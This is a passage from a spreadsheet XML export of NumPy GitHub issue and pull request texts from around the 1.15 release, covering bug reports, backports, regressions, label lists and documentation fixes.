import numpy as np_x000D_
&gt;&gt;&gt; a = np.zeros(1, dtype=[('f0', 'i4', 3)])_x000D_
&gt;&gt;&gt; a.dtype['f0']_x000D_
dtype(('&lt;i4', (3,)))_x000D_
&gt;&gt;&gt; a['f0'].dtype_x000D_
dtype('int32')_x000D_
```_x000D_
I am not sure if this is intended or if there is a good reason for this behavior, but it's rather unhelpful in my situation.</t>
  </si>
  <si>
    <t>a['f0'].dtype != a.dtype['f0']</t>
  </si>
  <si>
    <t>Method docstrings make more sense in the type itself rather than in a function that produces the type._x000D_
_x000D_
These docstring are pretty sub-par for numpy, but I'd prefer to leave improving them to a later commit_x000D_
_x000D_
--_x000D_
_x000D_
I haven't attempted to build the docs locally, but I'm hoping I can preview them somehow via the CI?</t>
  </si>
  <si>
    <t>DOC: Move documentation from `help(ndarray.ctypes)` to `help(some_array.ctypes)`</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11754._x000D_
_x000D_
test, fix for not checking return value from call to_x000D_
_buffer_format_string, exposed when datetime64 dtype used in a field._x000D_
Also fixes some variable types to be Py_ssize_t._x000D_
_x000D_
* BUG: check return value of _buffer_format_string_x000D_
_x000D_
* fix from review, document _buffer_format_string_x000D_
_x000D_
* BUG: Fix type in declaration of old_offset._x000D_
_x000D_
Type should be Py_ssize_t._x000D_
_x000D_
* MAINT: Explicitly return -1 for error._x000D_
_x000D_
* MAINT: Fix typo and style nit._x000D_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</si>
  <si>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check return value of _buffer_format_string</t>
  </si>
  <si>
    <t xml:space="preserve">The result of running an `fft` on an array view is different then running it on a new array of equivalent data._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
# make random data_x000D_
a = np.random.rand(3, 3) + 1j * np.random.rand(3, 3)_x000D_
_x000D_
# make a view with one empty axis_x000D_
a_view = a[np.newaxis]_x000D_
# make a new array with one empty axis_x000D_
a_new = a.reshape(1, 3, 3)_x000D_
_x000D_
# take ffts  along the last axis of these arrays_x000D_
b = np.fft.fftn(a, axes=(-1,)).squeeze()_x000D_
b_view = np.fft.fftn(a_view, axes=(-1,)).squeeze()_x000D_
b_new = np.fft.fftn(a_new, axes=(-1,)).squeeze()_x000D_
_x000D_
# check that they all are equal_x000D_
assert np.array_equal(a_new, a_view), "Arrays not equal ..."_x000D_
assert np.array_equal(b, b_new), "New array failed ..."_x000D_
assert np.array_equal(b, b_view), "View failed ..."_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
AssertionError                            Traceback (most recent call last)_x000D_
&lt;ipython-input-164-0858f30a28df&gt; in &lt;module&gt;()_x000D_
      9 assert np.array_equal(a_view, a_new), "Arrays not equal"_x000D_
     10 assert np.array_equal(b, b_new), "New array failed ..."_x000D_
---&gt; 11 assert np.array_equal(b, b_view), "View failed ..."_x000D_
_x000D_
AssertionError: View failed ..._x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.15.0 3.6.6 | packaged by conda-forge | (default, Jul 26 2018, 09:55:02) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>TST: Add test for FFT case that used to be buggy in intels fft monkeypatch</t>
  </si>
  <si>
    <t>['05 - Testing', '29 - Intel/Anaconda']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11484 and #11514._x000D_
_x000D_
Relates to #11483._x000D_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</si>
  <si>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Increase required cython version on python 3.7</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11642._x000D_
_x000D_
* Fixes for unicode field names in Python 2_x000D_
_x000D_
* Allow specifying a single comma-separated unicode string of names in np.rec.fromarrays_x000D_
* Allow sorting on unicode field names._x000D_
_x000D_
This addresses some of the problems raised in issue #2407_x000D_
_x000D_
* Use skipif decorator, check constructed array has correct data_x000D_
_x000D_
* cleaner isinstance() check, have new tests to run on py3 as well_x000D_
_x000D_
* Fix silly mistake in test_x000D_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</si>
  <si>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 xml:space="preserve">BUG: Fixes for unicode field names in Python 2 </t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11727._x000D_
_x000D_
The high and low parts of the IBM double-double always come in the same_x000D_
order, regardless of the endianness of the system, according to [1]._x000D_
_x000D_
[1] https://www.ibm.com/support/knowledgecenter/en/ssw_aix_71/com.ibm.aix.genprogc/128bit_long_double_floating-point_datatype.htm_x000D_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</si>
  <si>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printing of longdouble on ppc64le.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11725._x000D_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</si>
  <si>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Fortran kind detection for aarch64 &amp; s390x.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11718._x000D_
_x000D_
The changes introduced in #10463 caused f2py to hang in somde_x000D_
circumstances. There is may a better fix than this, but_x000D_
until it is implemented it is better to undo the change._x000D_
_x000D_
Closes #11649._x000D_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</si>
  <si>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Revert use of `console_scripts`.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>MAINT: Fix typos in random.hypergeometric's notes</t>
  </si>
  <si>
    <t>Test and fix for not checking return value from call to `_buffer_format_string`, exposed when_x000D_
`datetime64` dtype used in a field.</t>
  </si>
  <si>
    <t>BUG: check return value of `_buffer_format_string`</t>
  </si>
  <si>
    <t>### Background_x000D_
_x000D_
While looking through the source for some of the `dtype` internals (`numpy/core/src/multiarray/descriptor.c`) I noticed that C code calling Python code in `_convert_from_commastring()` is described in the comments as:_x000D_
_x000D_
&gt; path critical C code calling Python code_x000D_
_x000D_
that should be cleaned up and re-written in C. While that particular effort looks very challenging (either re-implement the regex in C or use platform-specific regex options in C), there are other locations in the source code where `PyImport_ImportModule` is used to call Python code from C code, perhaps to some detriment (as the above comment implies)._x000D_
_x000D_
### The target here_x000D_
_x000D_
One of the awkward C-calling-Python scenarios surrounds the `_newnames()` function, which seems to be used a lot with i.e., `recarray` for handling fields. There are several C functions in `numpy/core/src/multiarray/methods.c` that call the Python version of this function, presumably to perform similar tasks._x000D_
_x000D_
### The changes here_x000D_
_x000D_
I've reimplemented `_newnames()` using C / Python C-API; it was pretty painful to get working despite the apparent simplicity of the Python version. The Python equivalent has been removed and the C code now calls a C function proper that appears to now do the same thing as the previous Python version._x000D_
_x000D_
Not sure if this kind of transformation / maintenance is really called for, but it does seem less ugly to avoid the Python-C-Python thing. What do people think?</t>
  </si>
  <si>
    <t>MAINT: C code no longer calls Python _newnames()</t>
  </si>
  <si>
    <t xml:space="preserve">Text bz2 files are not well supported in Python2, and, following the_x000D_
NumPy upgrade in text handling, loadtxt was raising an error when they_x000D_
were detected. This led to problems for those few who were using such_x000D_
files. This patch is a quick fix that issues a RuntimeWarning, then_x000D_
opens those files under the assumption that they are latin1 encoded._x000D_
Caveat emptor._x000D_
_x000D_
Closes #11633._x000D_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</si>
  <si>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regression in loadtxt for bz2 text files in Python 2.</t>
  </si>
  <si>
    <t xml:space="preserve">* Remove misleading reference to numpy/polynomial/polynomial/polyfit._x000D_
* Add missing period in numpy/polynomial/_polybase.py_x000D_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</si>
  <si>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DOC: Small docstring fixes for old polyfit.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.lib', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t xml:space="preserve">The issues seems to be that in numpy/testing/_private/utils.py ```(x_id == y_id).all()``` on Line 707 is returning a ```bool``` in Python 3.5 and thus calling all on it is giving an ```AttributeError```._x000D_
This is causing errors when testing the Pyrr package._x000D_
_x000D_
**Note**: This issue occurs with numpy==1.15.0 but not numpy==1.14.5_x000D_
_x000D_
### Reproducing code example:_x000D_
This is one of the four code snippets that has the error is occurring._x000D_
_x000D_
```python_x000D_
from __future__ import absolute_import, division, print_function_x000D_
try:_x000D_
    import unittest2 as unittest_x000D_
except:_x000D_
    import unittest_x000D_
import numpy as np_x000D_
from pyrr import Quaternion, Matrix44, Matrix33, Vector3, Vector4, euler_x000D_
_x000D_
class test_matrix_quaternion(unittest.TestCase):_x000D_
    def test_m44_q_equivalence(self):_x000D_
        """Test for equivalance of matrix and quaternion rotations._x000D_
_x000D_
        Create a matrix and quaternion, rotate each by the same values_x000D_
        then convert matrix&lt;-&gt;quaternion and check the results are the same._x000D_
        """_x000D_
        m = Matrix44.from_x_rotation(np.pi / 2.)_x000D_
        mq = Quaternion.from_matrix(m)_x000D_
_x000D_
        q = Quaternion.from_x_rotation(np.pi / 2.)_x000D_
        qm = Matrix44.from_quaternion(q)_x000D_
_x000D_
        self.assertTrue(np.allclose(np.dot([1., 0., 0., 1.], m), [1., 0., 0., 1.]))_x000D_
        self.assertTrue(np.allclose(np.dot([1., 0., 0., 1.], qm), [1., 0., 0., 1.]))_x000D_
_x000D_
        self.assertTrue(np.allclose(q * Vector4([1., 0., 0., 1.]), [1., 0., 0., 1.]))_x000D_
        self.assertTrue(np.allclose(mq * Vector4([1., 0., 0., 1.]), [1., 0., 0., 1.]))_x000D_
_x000D_
        np.testing.assert_almost_equal(q, mq, decimal=5)_x000D_
        np.testing.assert_almost_equal(m, qm, decimal=5)_x000D_
_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
The errors can be found at https://travis-ci.org/adamlwgriffiths/Pyrr/jobs/415907003_x000D_
Lines: 486, 502, 518, 534_x000D_
_x000D_
The following is the Traceback from Travis CI_x000D_
```_x000D_
======================================================================_x000D_
ERROR: Test for equivalance of matrix and quaternion rotations._x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "/home/travis/build/adamlwgriffiths/Pyrr/pyrr/tests/objects/test_equivalence.py", line 29, in test_m44_q_equivalence_x000D_
    np.testing.assert_almost_equal(q, mq, decimal=5)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 568, in assert_almost_equal_x000D_
    return assert_array_almost_equal(actual, desired, decimal, err_msg)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 964, in assert_array_almost_equal_x000D_
    precision=decimal)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 736, in assert_array_compare_x000D_
    flagged = func_assert_same_pos(x, y, func=isnan, hasval='nan')_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 707, in func_assert_same_pos_x000D_
    if (x_id == y_id).all() != True:_x000D_
AttributeError: 'bool' object has no attribute 'all'_x000D_
======================================================================_x000D_
ERROR: test_decompose (pyrr.tests.objects.test_matrix44.test_object_matrix44)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "/home/travis/build/adamlwgriffiths/Pyrr/pyrr/tests/objects/test_matrix44.py", line 326, in test_decompose_x000D_
    np.testing.assert_almost_equal(m, expected_model)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 568, in assert_almost_equal_x000D_
    return assert_array_almost_equal(actual, desired, decimal, err_msg)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 964, in assert_array_almost_equal_x000D_
    precision=decimal)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 736, in assert_array_compare_x000D_
    flagged = func_assert_same_pos(x, y, func=isnan, hasval='nan')_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 707, in func_assert_same_pos_x000D_
    if (x_id == y_id).all() != True:_x000D_
AttributeError: 'bool' object has no attribute 'all'_x000D_
======================================================================_x000D_
ERROR: test_normalize (pyrr.tests.objects.test_vector3.test_object_vector3)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "/home/travis/build/adamlwgriffiths/Pyrr/pyrr/tests/objects/test_vector3.py", line 77, in test_normalize_x000D_
    np.testing.assert_almost_equal(v.normalized, [0.57735, 0.57735, 0.57735], decimal=5)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 568, in assert_almost_equal_x000D_
    return assert_array_almost_equal(actual, desired, decimal, err_msg)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 964, in assert_array_almost_equal_x000D_
    precision=decimal)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 736, in assert_array_compare_x000D_
    flagged = func_assert_same_pos(x, y, func=isnan, hasval='nan')_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 707, in func_assert_same_pos_x000D_
    if (x_id == y_id).all() != True:_x000D_
AttributeError: 'bool' object has no attribute 'all'_x000D_
======================================================================_x000D_
ERROR: test_normalize (pyrr.tests.objects.test_vector4.test_object_vector4)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "/home/travis/build/adamlwgriffiths/Pyrr/pyrr/tests/objects/test_vector4.py", line 60, in test_normalize_x000D_
    np.testing.assert_almost_equal(v.normalized, [0.5, 0.5, 0.5, 0.5], decimal=5)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 568, in assert_almost_equal_x000D_
    return assert_array_almost_equal(actual, desired, decimal, err_msg)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 964, in assert_array_almost_equal_x000D_
    precision=decimal)_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 736, in assert_array_compare_x000D_
    flagged = func_assert_same_pos(x, y, func=isnan, hasval='nan')_x000D_
  File "/home/travis/virtualenv/python3.5.6/lib/python3.5/site-packages/numpy/testing/_private/utils.py", line 707, in func_assert_same_pos_x000D_
    if (x_id == y_id).all() != True:_x000D_
AttributeError: 'bool' object has no attribute 'all'_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.15.0 3.5.5 |Anaconda, Inc.| (default, Apr  7 2018, 04:52:34) [MSC v.1900 64 bit (AMD64)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.testing.assert_almost_equal Issue in Python 3.5 for numpy==1.15.0</t>
  </si>
  <si>
    <t>There are still many [warnings when building](https://circleci.com/gh/numpy/numpy/2984?utm_campaign=vcs-integration-link&amp;utm_medium=referral&amp;utm_source=github-build-link) documentation, this cleanup removes those that were obvious and moves duplicate documentation of some functions from `user/c-api...` to `reference/c-api...`_x000D_
_x000D_
The `WARNING: Unexpected section title` are coming from `docutils`, when we have examples in an attribute section. Setting the default `match_titles` parameter in `docutils/parsers/rst/states.py` seems to quiet these:_x000D_
```_x000D_
2824,2825c2824_x000D_
&lt;         self.nested_parse(indented, input_offset=line_offset, node=definition,_x000D_
&lt;                           match_titles=True)_x000D_
---_x000D_
&gt;         self.nested_parse(indented, input_offset=line_offset, node=definition)_x000D_
```</t>
  </si>
  <si>
    <t>DOC: Reduce warnings and cleanup redundant c-api documentation</t>
  </si>
  <si>
    <t>Test, fix for deprecation error causing segfault.</t>
  </si>
  <si>
    <t>Fixes #9440. The comment in the code was incorrect, `array_setstate` used in unpickling does not call `_IsWriteable`. `_IsWriteable` is only used in setting flags._x000D_
_x000D_
Note that new pickling tests use a large buffer to ensure it goes through `PyArray_SetBaseObject` in `array_setstate`, but that the flag is still set to `writeable`.</t>
  </si>
  <si>
    <t>BUG: disallow setting flag to writeable after fromstring, frombuffer</t>
  </si>
  <si>
    <t>As discussed with @eric-wieser and @markshannon in https://github.com/numpy/numpy/pull/11722, LGTM raises a number of "Undefined export" alerts in `__init__.py`: these functions are indeed undefined at analysis time, but are actually provided by the Cython module `np.random.mtrand`._x000D_
_x000D_
This PR sits on top of #11722 and introduces an `lgtm.yml` file to tweak the Python analysis on LGTM.com: it will still analyse `__init__.py`, but it will classify the file as `generated`. This means that the results will not be shown by default in the LGTM interface, nor will they weigh towards the code quality score._x000D_
_x000D_
An alternative would be to completely disable the "Undefined export" query (`py/undefined-export`) on LGTM, but I think that's not needed in this case. [Here's some more information](https://lgtm.com/help/lgtm/lgtm.yml-configuration-file) on tweaking LGTM's analysis using a `lgtm.yml` file.</t>
  </si>
  <si>
    <t>TST, MAINT: add lgtm.yml to tweak LGTM.com analysis</t>
  </si>
  <si>
    <t xml:space="preserve">The TestMaskedArrayMethods.test_sort_flexible test was failing for for_x000D_
the subarray checks on big endian systems. That was probably due to_x000D_
subarrays being sorted as bytestrings. This fixes the test by simply_x000D_
checking that the sort does not error rather than checking the result._x000D_
_x000D_
Closes #11716._x000D_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</si>
  <si>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 xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
This appears to be a defect that is specific to Intel's Math Kernel Library and the resolution will likely require changes therein. I'm submitting here as I believe the NumPy team has some relationships/connections with the Intel team and there have been some efforts to make MKL work well with NumPy (and SciPy). I am using Python 3.6.4, built from source on OSX 10.13.4 and Linux 16.04 (WSL). NumPy is built from source using gcc 7.1.0 on Mac and gcc 7.2 on Linux._x000D_
_x000D_
When executed with python3 this script will hang the terminal on OSX and Linux. No tests have been performed on Win64. If the size of the vector, x, is reduced by a factor of 10 to 1000, no hang is observed and the script executes correctly. The hang is specific to the call to linalg.norm. It is likely caused by multi-threaded execution of the norm() method using MKL's infrastructure, leaving the system in a state that interferes with Python execution of subprocess.run(). I also get a hang when using Python's Multiprocessing module process creation in place of subprocess.run()._x000D_
_x000D_
This is important for a few reasons 1) Jupyter QtConsole &amp; Notebook and IPython use subprocess.run() to execute certain os commands (such as ls). Hence we get a hang when working in all these applications. 2) If you want to spawn or fork to subprocesses to execute cpu intensive tasks you'll get a hang if you've previously called np.linalg.norm() with a sufficiently large vector (and perhaps many other NumPy and SciPy calls)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import subprocess_x000D_
_x000D_
x = np.arange(10000) # 1000 shows no hang._x000D_
xnorm = np.linalg.norm(x)_x000D_
_x000D_
subprocess.run('ls')_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
No error message, just a hang._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
NumPy 1.14.3_x000D_
Python 3.6.4_x000D_
MKL: l_mkl_2018.3.222, m_mkl_2018.3.185_x000D_
</t>
  </si>
  <si>
    <t>Numpy MKL causes hang with Python Subprocess and Multiprocessing modules.</t>
  </si>
  <si>
    <t>Closes #11732 as per the comment in the issue.</t>
  </si>
  <si>
    <t>DOC: recommend polynomial.Polynomial over np.polyfit</t>
  </si>
  <si>
    <t>"an single" typo pointed out by keithbriggs - see gh-11730.</t>
  </si>
  <si>
    <t>DOC: fix typo in vectorize docstring</t>
  </si>
  <si>
    <t>The high and low parts of the IBM double-double always come in the same_x000D_
order, regardless of the endianness of the system, according to [the link in the code](https://www.ibm.com/support/knowledgecenter/en/ssw_aix_71/com.ibm.aix.genprogc/128bit_long_double_floating-point_datatype.htm)._x000D_
_x000D_
Fixes #11726._x000D_
_x000D_
[Build on ppc64le](https://koji.fedoraproject.org/koji/taskinfo?taskID=29039240) is not quite complete yet, but it passed Python 2.7 already, and just needs to finish checking Python 3.7.</t>
  </si>
  <si>
    <t>See https://github.com/numpy/numpy/issues/3424#issuecomment-412327556 and #8659.</t>
  </si>
  <si>
    <t>This should fix a lot of LGTM errors_x000D_
_x000D_
Note that this leaves the value of `np.random.__doc__` unchanged</t>
  </si>
  <si>
    <t>MAINT: Remove duplicate docstring and correct location of `__all__` in np.random</t>
  </si>
  <si>
    <t xml:space="preserve">We do this by going through ctypes.from_buffer, which keeps the object the buffer came from alive._x000D_
_x000D_
Fixes #9647_x000D_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</si>
  <si>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Make `arr.ctypes.data` hold onto a reference to the underlying array</t>
  </si>
  <si>
    <t xml:space="preserve">False is the documented value and the value used in 1.14, but 1.15.0 was_x000D_
turning optimization on when there were more than two arguments,_x000D_
resulting in slowdowns for small matrices. This choice can be revisited_x000D_
as the einsum optimization code matures._x000D_
_x000D_
Closes #11714._x000D_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</si>
  <si>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Make einsum optimize default to False.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '06 - Regression', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Both these functions are used by `Dragon4_PrintFloat_IEEE_binary128`, which was recently made available in #11568 on big-endian systems, but without these ones.</t>
  </si>
  <si>
    <t>BUG: Fix undefined functions on big-endian systems.</t>
  </si>
  <si>
    <t xml:space="preserve">The changes introduced in #10463 caused f2py to hang in somde_x000D_
circumstances. There is may a better fix than this, but_x000D_
until it is implemented it is better to undo the change._x000D_
_x000D_
Closes #11649._x000D_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</si>
  <si>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['00 - Bug', '06 - Regression', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>### Reproducing code example:_x000D_
Build NumPy and run the test suite in the Fedora build root. See full logs for [ppc64](https://koji.fedoraproject.org/koji/taskinfo?taskID=29010141) and [s390x](https://koji.fedoraproject.org/koji/taskinfo?taskID=29010143)._x000D_
_x000D_
### Error message:_x000D_
_x000D_
The result is the same for both arches:_x000D_
```_x000D_
E       AssertionError: _x000D_
E       Arrays are not equal_x000D_
E       _x000D_
E       (mismatch 85.7142857143%)_x000D_
E        x: array([([1, 1],), ([1, 2],), ([2, 1],), ([2, 2],), ([3, 3],), ([3, 1],),_x000D_
E              ([1, 0],)], dtype=[('v', '&gt;i8', (2,))])_x000D_
E        y: array([([1, 0],), ([1, 1],), ([1, 2],), ([2, 1],), ([2, 2],), ([3, 1],),_x000D_
E              ([1, 3],)], dtype=[('v', '&gt;i8', (2,))])_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
NumPy 1.15.0, Python 2.7_x000D_
_x000D_
I believe both of these arches are big-endian, so this might be something relevant.</t>
  </si>
  <si>
    <t>test_core.TestMaskedArrayMethods.test_sort_flexible fails on ppc64 &amp; s390x</t>
  </si>
  <si>
    <t>For whatever reason, this stubbing does not do anything. I think it is because the_x000D_
class setup overrides the module setup, but I did not look into it too deeply.  Renaming_x000D_
 `setup` to `setup_module` and `teardown` to `teardown_module` fixes that.</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
einsum is significantly slower in numpy 1.15 (when compared to numpy 1.14). Could be related to [#11686](https://github.com/numpy/numpy/issues/11686). I am not sure... I am using python 3.7.0 in Arch Linux._x000D_
_x000D_
I realize that 1.15 does bring some improvements to einsum in general; but, for this specific code, it is very slow!_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import time_x000D_
_x000D_
print(np.version.version)_x000D_
_x000D_
b = np.random.random((5, 2))_x000D_
t = np.random.random((5, 5, 2))_x000D_
p = np.random.random((2, 5))_x000D_
_x000D_
t1 = time.time()_x000D_
for _ in range(int(1e6)):_x000D_
    out = np.einsum('ij,ixy,ji-&gt;xy', b, t, p)_x000D_
t2 = time.time()_x000D_
print(t2-t1)_x000D_
```_x000D_
_x000D_
&lt;!-- Writing the output from my computer below --&gt;_x000D_
_x000D_
### Output 1:_x000D_
1.15.0_x000D_
129.36364936828613_x000D_
_x000D_
### Output 2:_x000D_
1.14.5_x000D_
4.071631908416748_x000D_
</t>
  </si>
  <si>
    <t>einsum in numpy 1.15 is almost 30 times slower than numpy 1.14!</t>
  </si>
  <si>
    <t xml:space="preserve">We do not have a good way to test that wheels are usable. `runtests.py` is designed to test in-place. It would be nice to have a `test_wheel.py` script that would build a virtualenv (optionally, not needed on Travis) , install numpy from a wheel, and test that all the scripts like f2py minimally work. Then we could run that script both offline and as part of the release build._x000D_
_x000D_
Related to issue #11649 </t>
  </si>
  <si>
    <t>MAINT: add a test_wheel.py script</t>
  </si>
  <si>
    <t>PR #11139 attempts to turn some compiler warnings into errors, in an attempt to make `runtests.py` fail before pushing commits to CI, where the logic to check for errors is a bit different (uses [grep to look for warnings](https://github.com/numpy/numpy/blob/master/tools/travis-test.sh#L51). Unfortunately that PR did not test clang, which has different warning flags.  Subsequently we tried to fix the logic, see #11566 (sometimes `clang` masquerades as `gcc`). Here is one more fix. _x000D_
_x000D_
The logic distutils uses to find `CC` is _x000D_
_x000D_
- look in os.environ for `CC`_x000D_
- if not found, look in `distutils.sysconfig`_x000D_
_x000D_
This PR mimics that logic to determine use of `gcc` and the ability to turn warnings into errors. No effort is made to find the equivalent set of `clang` flags, since the motivation is to detect CI failures before pushing a branch. Once we add clang to our CI matrix, we should revisit this area of the code._x000D_
_x000D_
I tested this by `export CC=clang; export CXX=clang` and running `runtests.py`</t>
  </si>
  <si>
    <t>BUG: Check for compiler used in env['CC'], then config_vars['CC']</t>
  </si>
  <si>
    <t>BUG: Fix regression in np.loadtxt for bz2 text files in Python 2.</t>
  </si>
  <si>
    <t xml:space="preserve">From the docs the `obj`: "Object that defines the index or indices before which values is inserted."_x000D_
Therefore passing `obj=-1` should and the value to the end of the array but it inserts it as the second-to-last value. This occurs in version 1.15.0 and 0.14.3, not sure if this is true for all versions._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.arange(4)_x000D_
b = np.insert(a, obj=-1, values=9)_x000D_
print(b)_x000D_
assert b[-1] == 9_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
`assert b[-1] == 9` rasies `AssertionError`_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.0 3.6.4 (default, Jan  6 2018, 11:51:59) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.39.2)]_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.insert using index of -1, inserts value not at end of array</t>
  </si>
  <si>
    <t xml:space="preserve"> i tried_x000D_
_x000D_
`pip install numpy==1.14.5`_x000D_
_x000D_
 but every time this error keeps going_x000D_
_x000D_
`Command "/usr/bin/python -u -c "import setuptools, tokenize;__file__='/tmp/pip-i nstall-LkomBi/numpy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f .read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" i nstall --record /tmp/pip-record-bAHGSs/install-record.txt --single-version-exter nally-managed --compile" failed with error code 1 in /tmp/pip-install-LkomBi/num py/`</t>
  </si>
  <si>
    <t xml:space="preserve">numpy installation in cygwin issue </t>
  </si>
  <si>
    <t xml:space="preserve">Attempts to use this on either cpython27 or cpython35, in either a shell or a script, gives:_x000D_
_x000D_
    NameError: name '__path__' is not defined_x000D_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</si>
  <si>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Remove np.pkgload, which seems to be unusable anyway</t>
  </si>
  <si>
    <t>CI for more "exotic" platforms like ARM is [on our roadmap](http://www.numpy.org/neps/roadmap.html#continuous-integration). Since there's a [free ARMv8-a machine pool available from shippable](http://blog.shippable.com/shippable-arm-packet-deliver-native-ci-cd-for-arm-architecture) I went ahead and drafted a feature branch in my NumPy fork that contains a [`shippable.yml`](https://github.com/tylerjereddy/numpy/blob/shippable_arm_ci/shippable.yml) with a few basic commands to build &amp; test NumPy._x000D_
_x000D_
The console results are [available here](https://app.shippable.com/github/tylerjereddy/numpy/runs/5/1/console), and hopefully you can see those. In short, `python runtests.py` seems to build without problems and produce this test output:_x000D_
`1 failed, 4627 passed, 406 skipped, 87 deselected, 10 xfailed in 226.59 seconds`_x000D_
_x000D_
There are probably various discussion points, including whether we really want to do this, but a few initial observations:_x000D_
_x000D_
- the above is with Python 2.7 because there seem to be some challenges getting pre-installed 3.6 to work by default with their ARM shared pool image_x000D_
- seems like a lot of skipped tests above &amp; we'd have to make sure that the default virtual env isolation is appropriate and there's no other NumPy system installation causing issues, etc. (I think we are very cautious about this stuff on Travis)_x000D_
  - cython is (so far) the only dependency that I pip installed so would indeed have to check the environment stuff quite carefully to see what is preloaded or prevent interaction with it_x000D_
- I did have to email them to get permission to access the free pool, but they were very fast / responsive (minutes usually so far)_x000D_
_x000D_
Other Note: I didn't initiate this as a PR directly to NumPy so that I could avoid trying to register the actual NumPy organization with the service until i.e. core devs / steering committee have weighed in, etc.</t>
  </si>
  <si>
    <t>TST: ARMv8 sample CI build</t>
  </si>
  <si>
    <t>Noticed while looking at #11694</t>
  </si>
  <si>
    <t>BUG: Add missing PyErr_NoMemory after failing malloc</t>
  </si>
  <si>
    <t xml:space="preserve">This fixes a regression introduced in #10985. Using matmul instead of_x000D_
dot lost the object type while adding the ability to deal with matrix_x000D_
stacks. This implements a partial fix by using dot for 2-D object_x000D_
arrays, but object array stacks cannot be handled._x000D_
_x000D_
Closes #11635._x000D_
_x000D_
Note that this may be fixed differently when matmul becomes a ufunc, but the tests are still useful and this fix is needed for 1.15.1._x000D_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</si>
  <si>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Make matrix_power again work for object arrays.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>Fixes #11656, which is a regression after #10564._x000D_
_x000D_
Adds tests for pickling datetime64 and timedelta64 scalars. Pickling arrays of these `dtype`s works but pickling scalars fails. _x000D_
